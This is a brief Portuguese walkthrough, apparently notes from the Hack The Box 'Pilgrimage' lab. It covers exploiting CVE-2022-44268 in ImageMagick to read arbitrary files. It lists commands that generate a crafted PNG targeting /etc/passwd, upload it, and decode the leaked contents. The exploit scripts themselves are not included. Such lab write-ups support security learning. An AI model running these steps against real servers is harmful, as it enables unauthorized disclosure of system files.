
ImageMagick Leitura Arbitrária de Arquivos - CVE-2022-44268
também usado no htb pilgrimage
Os pesquisadores da MetabaseQ descobriram o CVE-2022-44268, ou seja, o ImageMagick 7.1.0-49 é vulnerável a Divulgação de Informações. Quando analisa uma imagem PNG (por exemplo, para redimensionar), a imagem resultante pode ter incorporado o conteúdo de um arquivo remoto arbitrário (se o binário do ImageMagick tiver permissões para lê-lo).
Passo 1 :
execute
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
Passo 2 ;
execute
python3 magick_exploit.py generate -l [local_file] -o [output_file]
aqui neste caso o arquivo local é '/etc/passwd' que eu quero obter da máquina vítima.
passo 3 :
faça upload do arquivo de imagem no site
passo 4 :
obtenha o arquivo de imagem convertido do site. nomeie-o como 'downloaded_image.png'
passo 5:
execute
python3 decode_profile.py

se houver algum erro como
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
Isso significa que o arquivo que você mencionou não existe. Use /etc/passwd para verificação de sanidade.